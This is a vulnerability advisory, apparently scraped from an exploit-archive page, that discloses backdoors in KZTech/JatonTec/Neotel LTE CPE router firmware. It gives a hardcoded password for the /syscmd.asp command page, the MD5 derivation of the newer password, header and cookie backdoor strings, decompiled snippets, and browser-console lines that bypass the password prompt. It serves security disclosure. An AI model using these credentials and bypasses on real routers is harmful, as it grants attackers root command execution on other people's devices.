扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 |
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution # Date: 03.02.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk http://www.jatontec.com/products/show.php?itemid=258 http://www.jatontech.com/CAT12.html#_pp=105_564 http://www.kzbtech.com/AM3300V.html <blockquote class="wp-embedded-content" data-secret="H8go9LCYGl"><a href="https://neotel.mk/ostanati-paketi-2/" target="_blank"rel="external nofollow" class="external" >Останати пакети</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="“Останати пакети” — НЕОТЕЛ" src="https://neotel.mk/ostanati-paketi-2/embed/#?secret=0TyB0hGxSM#?secret=H8go9LCYGl" data-secret="H8go9LCYGl" frameborder="0" marginmarginscrolling="no"></iframe> Affected version:Model | Firmware -------|--------- JT3500V | 2.0.1B1064 JT3300V | 2.0.1B1047 AM6200M | 2.0.0B3210 AM6000N | 2.0.0B3042 AM5000W | 2.0.0B3037 AM4200M | 2.0.0B2996 AM4100V | 2.0.0B2988 AM3500MW | 2.0.0B1092 AM3410V | 2.0.0B1085 AM3300V | 2.0.0B1060 AM3100E | 2.0.0B981 AM3100V | 2.0.0B946 AM3000M | 2.0.0B21 KZ7621U | 2.0.0B14 KZ3220M | 2.0.0B04 KZ3120R | 2.0.0B01 Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE product specially designed to enable quick and easy LTE fixed data service deployment for residential and SOHO customers. It provides high speed LAN, Wi-Fi and VoIP integrated services to end users who need both bandwidth and multi-media data service in residential homes or enterprises. The device has 2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall software for security. It provides an effective all-in-one solution to SOHO or residential customers. It can deliver up to 1Gbps max data throughput which can be very competitive to wired broadband access service. Desc: The device has several backdoors and hidden pages that allow remote code execution, overwriting of the bootrom and enabling debug mode. Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN Linux 2.6.36+ (mips) Mediatek APSoC SDK v4.3.1.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5639 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5639.php 03.02.2021 -- Older and newer models defer in backdoor code. By navigating to /syscmd.html or /syscmd.asp pages an attacker can authenticate and execute system commands with highest privileges. Old models (syscmd.asp) password: super1234 Newer models (syscmd.html) password: md5(WAN_MAC+version): $ curl -k https://192.168.1.1/goform/getImgVersionInfo {"currentImg":["1", "Y", "V2.0.0B3210"], "shadowImg":["0", "Y", "V2.0.0B04"]} ... pcVar6 = (char *)nvram_bufget(1,"WAN_MAC_ADDR"); if (*pcVar6 == 0) { pcVar6 = "6C:AD:EF:00:00:01"; } memset(acStack280,0,0x100); sprintf(acStack280,"generate debug password : %s %s",pcVar6,"V2.0.0B3210"); ... psMd5Init(auStack112); psMd5Update(auStack112,local_10,local_c); psMd5Final(auStack112,uParm1); return; ... Another 2 backdoors exist using the websCheckCookie() and specific header strings. ... iVar2 = strncmp(acStack2268,"UPGRADE:927",0xb); if (iVar2 != 0) { return 0xffffffff; } if ((*(char **)(iParm1 + 0xdc) != (char *)0x0) && (iVar2 = strncmp(*(char **)(iParm1 + 0xdc),"TONY@KZT",8), iVar2 != 0)) { return 0xffffffff; ... if (iVar1 != 0) goto LAB_0047c304; LAB_0047c32c: WebsDbgLog(2,"[%s] UserAgent=%s, username=%s,command=%s","startSysCmd",__s1_00,__s1_01,__s1); LAB_0047c35c: __n = strlen(__s1); if (__n == 0) { snprintf(acStack1560,0x200,"cat /dev/null > %s","/var/system_command.log"); WebsDbgLog(3,"[%s] %s","startSysCmd",acStack1560); system(acStack1560); websWrite(iParm1,"invalid command!"); goto LAB_0047c3f8; } ... Bypass the backdoor password request and enable debug mode from within the web console: $('#div_check').modal('hide');<--- syscmd.html g_password_check_alert.close(); <--- syscmd.asp |
体验盒子
